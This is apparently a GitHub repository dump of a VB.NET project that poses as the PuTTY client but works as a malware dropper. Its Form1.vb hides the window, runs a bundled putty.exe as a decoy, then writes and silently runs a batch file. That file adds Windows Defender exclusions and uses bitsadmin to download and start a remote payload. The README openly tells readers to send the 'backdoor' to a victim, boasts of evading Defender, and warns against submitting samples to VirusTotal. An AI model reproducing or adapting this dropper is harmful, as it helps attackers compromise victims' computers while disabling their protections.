├── .github └── workflows │ └── msbuild.yml ├── App.config ├── BITS └── BackgroundCopyManager1_5.vb ├── Form1.Designer.vb ├── Form1.resx ├── Form1.vb ├── My Project ├── Application.Designer.vb ├── Application.myapp ├── AssemblyInfo.vb ├── Resources.Designer.vb ├── Resources.resx ├── Settings.Designer.vb └── Settings.settings ├── My └── Resources.vb ├── Putty.sln ├── README.md ├── obj └── Debug │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Putty.Form1.resources │ ├── Putty.Resources.resources │ ├── Putty.pdb │ ├── Putty.xml │ ├── putty.vbproj.CoreCompileInputs.cache │ ├── putty.vbproj.FileListAbsolute.txt │ ├── putty.vbproj.GenerateResource.cache │ └── putty.vbprojAssemblyReference.cache ├── putty.exe ├── putty.vbproj ├── putty.vbproj.user └── s.ico /.github/workflows/msbuild.yml: -------------------------------------------------------------------------------- 1 | name: MSBuild 2 | 3 | on: [push] 4 | 5 | env: 6 | # Path to the solution file relative to the root of the project. 7 | SOLUTION_FILE_PATH: putty.vbproj 8 | 9 | # Configuration type to build. 10 | # You can convert this to a build matrix if you need coverage of multiple configuration types. 11 | # https://docs.github.com/actions/learn-github-actions/managing-complex-workflows#using-a-build-matrix 12 | BUILD_CONFIGURATION: Release 13 | 14 | jobs: 15 | build: 16 | runs-on: windows-latest 17 | 18 | steps: 19 | - uses: actions/checkout@v2 20 | 21 | - name: Add MSBuild to PATH 22 | uses: microsoft/setup-msbuild@v1 23 | 24 | - name: Restore NuGet packages 25 | working-directory: ${{env.GITHUB_WORKSPACE}} 26 | run: nuget restore ${{env.SOLUTION_FILE_PATH}} 27 | 28 | - name: Build 29 | working-directory: ${{env.GITHUB_WORKSPACE}} 30 | # Add additional options to the MSBuild command line here (like platform or verbosity level). 31 | # See https://docs.microsoft.com/visualstudio/msbuild/msbuild-command-line-reference 32 | run: msbuild /m /p:Configuration=${{env.BUILD_CONFIGURATION}} ${{env.SOLUTION_FILE_PATH}} 33 | 34 | - name: Upload Release 35 | uses: actions/upload-artifact@v1 36 | with: 37 | name: Release 38 | path: "Bin/Release" 39 | -------------------------------------------------------------------------------- /App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /BITS/BackgroundCopyManager1_5.vb: -------------------------------------------------------------------------------- 1 | Namespace BITS 2 | Friend Class BackgroundCopyManager1_5 3 | End Class 4 | End Namespace 5 | -------------------------------------------------------------------------------- /Form1.Designer.vb: -------------------------------------------------------------------------------- 1 |  _ 2 | Partial Class Form1 3 | Inherits System.Windows.Forms.Form 4 | 5 | 'Form overrides dispose to clean up the component list. 6 | _ 7 | Protected Overrides Sub Dispose(ByVal disposing As Boolean) 8 | Try 9 | If disposing AndAlso components IsNot Nothing Then 10 | components.Dispose() 11 | End If 12 | Finally 13 | MyBase.Dispose(disposing) 14 | End Try 15 | End Sub 16 | 17 | 'Required by the Windows Form Designer 18 | Private components As System.ComponentModel.IContainer 19 | 20 | 'NOTE: The following procedure is required by the Windows Form Designer 21 | 'It can be modified using the Windows Form Designer. 22 | 'Do not modify it using the code editor. 23 | _ 24 | Private Sub InitializeComponent() 25 | Me.SuspendLayout() 26 | ' 27 | 'Form1 28 | ' 29 | Me.AutoScaleDimensions = New System.Drawing.SizeF(8.0!, 16.0!) 30 | Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font 31 | Me.ClientSize = New System.Drawing.Size(800, 450) 32 | Me.Name = "Form1" 33 | Me.Text = "Form1" 34 | Me.ResumeLayout(False) 35 | 36 | End Sub 37 | 38 | End Class 39 | -------------------------------------------------------------------------------- /Form1.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /Form1.vb: -------------------------------------------------------------------------------- 1 | Imports System.IO 2 | 3 | 4 | Public Class Form1 5 | Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load 6 | Me.Hide() 7 | Me.Opacity = 0 8 | Me.ShowInTaskbar = False 9 | 10 | 11 | 12 | Dim Ressourcl() As Byte = My.Resources.putty 13 | 14 | 15 | 16 | FileOpen(1, Environ("tmp") & "\putty.exe", OpenMode.Binary) 'here insert exe name 17 | FilePut(1, Ressourcl) 18 | FileClose(1) 19 | Dim files As String = Environ("tmp") & "\putty.exe" 'here insert exe file name 20 | Dim process As Process = Process.Start(files) 21 | 22 | System.Threading.Thread.Sleep(230000) 23 | 24 | 25 | 26 | 27 | Dim file As System.IO.StreamWriter 28 | Dim appDataPath As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) 29 | Dim FullFileName As String = Path.Combine(appDataPath, "notes.bat") 30 | file = My.Computer.FileSystem.OpenTextFileWriter(FullFileName, True) 31 | ' ਗੱਡੀ Lamborghini ਪੀਲੇ ਰੰਗ ਦੀ 32 | 'ਮੈਨੂੰ ਕਹਿੰਦੀ ਐ, "ਚਲਾ ਵੇ slowly" 33 | 'ਓ, ਪਹਿਲੇ gear 'ਤੇ ਉਹ ਜਦੋਂ ਮੋੜਦੀ 34 | ' ਉਹ ਮੈਨੂੰ ਲਗਨੀ ਐ the one And only (aye, aye) 35 | 'ਵਿਚਾਰੇ ਮੁੰਡਿਆਂ ਦੇ ਦਿਲਾਂ ਦੀ ਤੂੰ ਕਾਤਿਲ 36 | 'ਵਿਖਾ ਦੇ ਮੈਨੂੰ ਕਿਵੇਂ ਜਾਵੇਂਗੀ ਤੂੰ faster 37 | ' ਦਾਬ ਦੇ ਤੂੰ gas ਨੀ ਵੇ little bit harder 38 | 'A bit harder, yo 39 | 'I 'm a rider, provider 40 | 'Bring the heat, girl 41 | 'ਮੈਨੂੰ ਕਹਿੰਦੀ ਐ, "ਚਲਾ ਵੇ slowly" 42 | 'ਓ, ਪਹਿਲੇ gear 'ਤੇ ਉਹ ਜਦੋਂ ਮੋੜਦੀ 43 | ' ਉਹ ਮੈਨੂੰ ਲਗਨੀ ਐ the one And only (aye, aye) 44 | 'ਵਿਚਾਰੇ ਮੁੰਡਿਆਂ ਦੇ ਦਿਲਾਂ ਦੀ ਤੂੰ ਕਾਤਿਲ 45 | 'ਵਿਖਾ ਦੇ ਮੈਨੂੰ ਕਿਵੇਂ ਜਾਵੇਂਗੀ ਤੂੰ faster 46 | ' ਦਾਬ ਦੇ ਤੂੰ gas ਨੀ ਵੇ little bit harder 47 | 'A bit harder, yo 48 | 'I 'm a rider, provider 49 | 'Bring the heat, girl 50 | 'ਮੈਨੂੰ ਕਹਿੰਦੀ ਐ, "ਚਲਾ ਵੇ slowly" 51 | 'ਓ, ਪਹਿਲੇ gear 'ਤੇ ਉਹ ਜਦੋਂ ਮੋੜਦੀ 52 | ' ਉਹ ਮੈਨੂੰ ਲਗਨੀ ਐ the one And only (aye, aye) 53 | 'ਵਿਚਾਰੇ ਮੁੰਡਿਆਂ ਦੇ ਦਿਲਾਂ ਦੀ ਤੂੰ ਕਾਤਿਲ 54 | 'ਵਿਖਾ ਦੇ ਮੈਨੂੰ ਕਿਵੇਂ ਜਾਵੇਂਗੀ ਤੂੰ faster 55 | ' ਦਾਬ ਦੇ ਤੂੰ gas ਨੀ ਵੇ little bit harder 56 | 'A bit harder, yo 57 | 'I 'm a rider, provider 58 | 'Bring the heat, girl 59 | 60 | 61 | file.WriteLine("") 62 | file.WriteLine("powershell.exe -command ""Add-MpPreference -ExclusionExtension .tmp """) 63 | file.WriteLine("") 64 | file.WriteLine("powershell.exe -command ""Add-MpPreference -ExclusionExtension .exe """) 65 | file.WriteLine("") 66 | file.WriteLine("bitsadmin /transfer Explorers /download /priority FOREGROUND https://direct-url-for-payload/xxx.exe %temp%\payload.exe") 67 | file.WriteLine("") 68 | file.WriteLine("cd %TEMP%") 69 | file.WriteLine("") 70 | file.WriteLine("timeout 15") 71 | 72 | file.WriteLine("") 73 | 74 | file.WriteLine("start payload.exe") 75 | file.Close() 76 | 77 | 78 | 'I will bring the fire 79 | 'And my name keeps going worldwide 80 | ' So My job Is To satisfy ya (ah-ah, aye) 81 | 'Ah-ah, ah - ah, aye - aye 82 | 'Ah-ah, ah - ah, aye 83 | '(Ah-ah, ah-ah, aye-aye) To satisfy ya 84 | 'Ah-ah, ah - ah, aye 85 | 'Ah-ah, ah - ah, aye - aye 86 | 87 | Shell("cmd /c "" cd %APPDATA% && notes.bat """, AppWinStyle.Hide, True) 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | End Sub 100 | 101 | 102 | End Class 103 | -------------------------------------------------------------------------------- /My Project/Application.Designer.vb: -------------------------------------------------------------------------------- 1 | '------------------------------------------------------------------------------ 2 | ' 3 | ' This code was generated by a tool. 4 | ' Runtime Version:4.0.30319.42000 5 | ' 6 | ' Changes to this file may cause incorrect behavior and will be lost if 7 | ' the code is regenerated. 8 | ' 9 | '------------------------------------------------------------------------------ 10 | 11 | Option Strict On 12 | Option Explicit On 13 | 14 | 15 | Namespace My 16 | 17 | 'NOTE: This file is auto-generated; do not modify it directly. To make changes, 18 | ' or if you encounter build errors in this file, go to the Project Designer 19 | ' (go to Project Properties or double-click the My Project node in 20 | ' Solution Explorer), and make changes on the Application tab. 21 | ' 22 | Partial Friend Class MyApplication 23 | 24 | _ 25 | Public Sub New() 26 | MyBase.New(Global.Microsoft.VisualBasic.ApplicationServices.AuthenticationMode.Windows) 27 | Me.IsSingleInstance = false 28 | Me.EnableVisualStyles = true 29 | Me.SaveMySettingsOnExit = true 30 | Me.ShutDownStyle = Global.Microsoft.VisualBasic.ApplicationServices.ShutdownMode.AfterMainFormCloses 31 | End Sub 32 | 33 | _ 34 | Protected Overrides Sub OnCreateMainForm() 35 | Me.MainForm = Global.Putty.Form1 36 | End Sub 37 | End Class 38 | End Namespace 39 | -------------------------------------------------------------------------------- /My Project/Application.myapp: -------------------------------------------------------------------------------- 1 |  2 | 3 | true 4 | Form1 5 | false 6 | 0 7 | true 8 | 0 9 | 0 10 | true 11 | 12 | -------------------------------------------------------------------------------- /My Project/AssemblyInfo.vb: -------------------------------------------------------------------------------- 1 | Imports System 2 | Imports System.Reflection 3 | Imports System.Runtime.InteropServices 4 | 5 | ' General Information about an assembly is controlled through the following 6 | ' set of attributes. Change these attribute values to modify the information 7 | ' associated with an assembly. 8 | 9 | ' Review the values of the assembly attributes 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 'The following GUID is for the ID of the typelib if this project is exposed to COM 21 | 22 | 23 | ' Version information for an assembly consists of the following four values: 24 | ' 25 | ' Major Version 26 | ' Minor Version 27 | ' Build Number 28 | ' Revision 29 | ' 30 | ' You can specify all the values or you can default the Build and Revision Numbers 31 | ' by using the '*' as shown below: 32 | ' 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /My Project/Resources.Designer.vb: -------------------------------------------------------------------------------- 1 | '------------------------------------------------------------------------------ 2 | ' 3 | ' This code was generated by a tool. 4 | ' Runtime Version:4.0.30319.42000 5 | ' 6 | ' Changes to this file may cause incorrect behavior and will be lost if 7 | ' the code is regenerated. 8 | ' 9 | '------------------------------------------------------------------------------ 10 | 11 | Option Strict On 12 | Option Explicit On 13 | 14 | Imports System 15 | 16 | Namespace My.Resources 17 | 18 | 'This class was auto-generated by the StronglyTypedResourceBuilder 19 | 'class via a tool like ResGen or Visual Studio. 20 | 'To add or remove a member, edit your .ResX file then rerun ResGen 21 | 'with the /str option, or rebuild your VS project. 22 | ''' 23 | ''' A strongly-typed resource class, for looking up localized strings, etc. 24 | ''' 25 | _ 29 | Friend Module Resources 30 | 31 | Private resourceMan As Global.System.Resources.ResourceManager 32 | 33 | Private resourceCulture As Global.System.Globalization.CultureInfo 34 | 35 | ''' 36 | ''' Returns the cached ResourceManager instance used by this class. 37 | ''' 38 | _ 39 | Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager 40 | Get 41 | If Object.ReferenceEquals(resourceMan, Nothing) Then 42 | Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Putty.Resources", GetType(Resources).Assembly) 43 | resourceMan = temp 44 | End If 45 | Return resourceMan 46 | End Get 47 | End Property 48 | 49 | ''' 50 | ''' Overrides the current thread's CurrentUICulture property for all 51 | ''' resource lookups using this strongly typed resource class. 52 | ''' 53 | _ 54 | Friend Property Culture() As Global.System.Globalization.CultureInfo 55 | Get 56 | Return resourceCulture 57 | End Get 58 | Set 59 | resourceCulture = value 60 | End Set 61 | End Property 62 | 63 | ''' 64 | ''' Looks up a localized resource of type System.Byte[]. 65 | ''' 66 | Friend ReadOnly Property putty() As Byte() 67 | Get 68 | Dim obj As Object = ResourceManager.GetObject("putty", resourceCulture) 69 | Return CType(obj,Byte()) 70 | End Get 71 | End Property 72 | End Module 73 | End Namespace 74 | -------------------------------------------------------------------------------- /My Project/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 122 | ..\putty.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 123 | 124 | -------------------------------------------------------------------------------- /My Project/Settings.Designer.vb: -------------------------------------------------------------------------------- 1 | '------------------------------------------------------------------------------ 2 | ' 3 | ' This code was generated by a tool. 4 | ' Runtime Version:4.0.30319.42000 5 | ' 6 | ' Changes to this file may cause incorrect behavior and will be lost if 7 | ' the code is regenerated. 8 | ' 9 | '------------------------------------------------------------------------------ 10 | 11 | Option Strict On 12 | Option Explicit On 13 | 14 | 15 | Namespace My 16 | 17 | _ 20 | Partial Friend NotInheritable Class MySettings 21 | Inherits Global.System.Configuration.ApplicationSettingsBase 22 | 23 | Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings) 24 | 25 | #Region "My.Settings Auto-Save Functionality" 26 | #If _MyType = "WindowsForms" Then 27 | Private Shared addedHandler As Boolean 28 | 29 | Private Shared addedHandlerLockObject As New Object 30 | 31 | _ 32 | Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs) 33 | If My.Application.SaveMySettingsOnExit Then 34 | My.Settings.Save() 35 | End If 36 | End Sub 37 | #End If 38 | #End Region 39 | 40 | Public Shared ReadOnly Property [Default]() As MySettings 41 | Get 42 | 43 | #If _MyType = "WindowsForms" Then 44 | If Not addedHandler Then 45 | SyncLock addedHandlerLockObject 46 | If Not addedHandler Then 47 | AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings 48 | addedHandler = True 49 | End If 50 | End SyncLock 51 | End If 52 | #End If 53 | Return defaultInstance 54 | End Get 55 | End Property 56 | End Class 57 | End Namespace 58 | 59 | Namespace My 60 | 61 | _ 64 | Friend Module MySettingsProperty 65 | 66 | _ 67 | Friend ReadOnly Property Settings() As Global.Putty.My.MySettings 68 | Get 69 | Return Global.Putty.My.MySettings.Default 70 | End Get 71 | End Property 72 | End Module 73 | End Namespace 74 | -------------------------------------------------------------------------------- /My Project/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /My/Resources.vb: -------------------------------------------------------------------------------- 1 | Namespace My 2 | Friend Class Resources 3 | End Class 4 | End Namespace 5 | -------------------------------------------------------------------------------- /Putty.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30803.129 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "putty", "putty.vbproj", "{91BF8477-1ABE-4616-9EB0-3EB0D1239B60}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {91BF8477-1ABE-4616-9EB0-3EB0D1239B60}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {91BF8477-1ABE-4616-9EB0-3EB0D1239B60}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {91BF8477-1ABE-4616-9EB0-3EB0D1239B60}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {91BF8477-1ABE-4616-9EB0-3EB0D1239B60}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {E8589763-7ACC-4D23-8519-2B101DD8A398} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Requirements : 2 | ## 1. Visual Studio 2019 3 | ## 2. .NetFramework v4.5+ 4 | ## 3. Windows 10 5 | # Usage ::: 6 | ## 1. Edit this https://github.com/swagkarna/PuttyorMalware/blob/d3a6d835de6067510d192462b575e136c73a18a2/Form1.vb#L48 in visual studio and replace url with your payload url(must be direct link) 7 | ## 2. Now Just compile the code in visual studio you will find exe in debug/release folder 8 | 9 | # Putty in Action ::: 10 | ## 1.Now send the backdoor to victim. when victim run putty.exe as administrator the payload will start to download from server in temp folder and will be executed ... 11 | ## 2. This file is not detected by windows defender(at time of creation)...After Executing Putty Malware it will take 3 minutes to execute our payload 12 | 13 | # Note : 14 | ## Dont Submit sample to virustotal ... 15 | 16 | # Video Tutorial ::: 17 | ## [![IMAGE ALT TEXT](http://img.youtube.com/vi/AAUybR4v8k4/0.jpg)](http://www.youtube.com/watch?v=AAUybR4v8k4 "Is PuttyorMalware") 18 | # Disclaimer ::: 19 | ## Use it at your own risk...I am not responsible for your actions!!!!...Stay Safe!!!Stay Legal !!!.... 20 | -------------------------------------------------------------------------------- /obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swagkarna/PuttyorMalware/869c2d57bdaacd5589afbce5daf9c9db0a527eb6/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /obj/Debug/Putty.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swagkarna/PuttyorMalware/869c2d57bdaacd5589afbce5daf9c9db0a527eb6/obj/Debug/Putty.Form1.resources -------------------------------------------------------------------------------- /obj/Debug/Putty.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swagkarna/PuttyorMalware/869c2d57bdaacd5589afbce5daf9c9db0a527eb6/obj/Debug/Putty.Resources.resources -------------------------------------------------------------------------------- /obj/Debug/Putty.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swagkarna/PuttyorMalware/869c2d57bdaacd5589afbce5daf9c9db0a527eb6/obj/Debug/Putty.pdb -------------------------------------------------------------------------------- /obj/Debug/Putty.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Putty 6 | 7 | 8 | 9 | 10 | 11 | A strongly-typed resource class, for looking up localized strings, etc. 12 | 13 | 14 | 15 | 16 | Returns the cached ResourceManager instance used by this class. 17 | 18 | 19 | 20 | 21 | Overrides the current thread's CurrentUICulture property for all 22 | resource lookups using this strongly typed resource class. 23 | 24 | 25 | 26 | 27 | Looks up a localized resource of type System.Byte[]. 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /obj/Debug/putty.vbproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | c39cb726e49a6efd671e6c3e8c1d1b88a71d3df2 2 | -------------------------------------------------------------------------------- /obj/Debug/putty.vbproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\obj\Debug\putty.vbprojAssemblyReference.cache 2 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\obj\Debug\Putty.Form1.resources 3 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\obj\Debug\putty.vbproj.GenerateResource.cache 4 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\bin\Debug\Putty.exe.config 5 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\bin\Debug\Putty.exe 6 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\bin\Debug\Putty.pdb 7 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\bin\Debug\Putty.xml 8 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\obj\Debug\Putty.Resources.resources 9 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\obj\Debug\putty.vbproj.CoreCompileInputs.cache 10 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\obj\Debug\Putty.exe 11 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\obj\Debug\Putty.xml 12 | C:\Users\Lenovo\Downloads\SKLogger-master\PuttyorMalware-main\PuttyorMalware-main\obj\Debug\Putty.pdb 13 | -------------------------------------------------------------------------------- /obj/Debug/putty.vbproj.GenerateResource.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swagkarna/PuttyorMalware/869c2d57bdaacd5589afbce5daf9c9db0a527eb6/obj/Debug/putty.vbproj.GenerateResource.cache -------------------------------------------------------------------------------- /obj/Debug/putty.vbprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swagkarna/PuttyorMalware/869c2d57bdaacd5589afbce5daf9c9db0a527eb6/obj/Debug/putty.vbprojAssemblyReference.cache -------------------------------------------------------------------------------- /putty.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swagkarna/PuttyorMalware/869c2d57bdaacd5589afbce5daf9c9db0a527eb6/putty.exe -------------------------------------------------------------------------------- /putty.vbproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {91BF8477-1ABE-4616-9EB0-3EB0D1239B60} 8 | WinExe 9 | Putty.My.MyApplication 10 | Putty 11 | Putty 12 | 512 13 | WindowsForms 14 | v4.7.2 15 | true 16 | true 17 | false 18 | publish\ 19 | true 20 | Disk 21 | false 22 | Foreground 23 | 7 24 | Days 25 | false 26 | false 27 | true 28 | 0 29 | 1.0.0.%2a 30 | false 31 | true 32 | 33 | 34 | AnyCPU 35 | true 36 | full 37 | true 38 | true 39 | bin\Debug\ 40 | Putty.xml 41 | 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 42 | 43 | 44 | AnyCPU 45 | pdbonly 46 | false 47 | true 48 | true 49 | bin\Release\ 50 | Putty.xml 51 | 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 52 | 53 | 54 | On 55 | 56 | 57 | Binary 58 | 59 | 60 | Off 61 | 62 | 63 | On 64 | 65 | 66 | s.ico 67 | 68 | 69 | true 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | Form 100 | 101 | 102 | Form1.vb 103 | Form 104 | 105 | 106 | 107 | True 108 | Application.myapp 109 | True 110 | 111 | 112 | True 113 | True 114 | Resources.resx 115 | 116 | 117 | True 118 | Settings.settings 119 | True 120 | 121 | 122 | 123 | 124 | Form1.vb 125 | 126 | 127 | VbMyResourcesResXFileCodeGenerator 128 | My.Resources 129 | Designer 130 | Resources.Designer.vb 131 | 132 | 133 | 134 | 135 | MyApplicationCodeGenerator 136 | Application.Designer.vb 137 | 138 | 139 | SettingsSingleFileGenerator 140 | My 141 | Settings.Designer.vb 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | False 153 | Microsoft .NET Framework 4.7.2 %28x86 and x64%29 154 | true 155 | 156 | 157 | False 158 | .NET Framework 3.5 SP1 159 | false 160 | 161 | 162 | 163 | 164 | 165 | 166 | -------------------------------------------------------------------------------- /putty.vbproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | en-US 11 | false 12 | 13 | -------------------------------------------------------------------------------- /s.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swagkarna/PuttyorMalware/869c2d57bdaacd5589afbce5daf9c9db0a527eb6/s.ico --------------------------------------------------------------------------------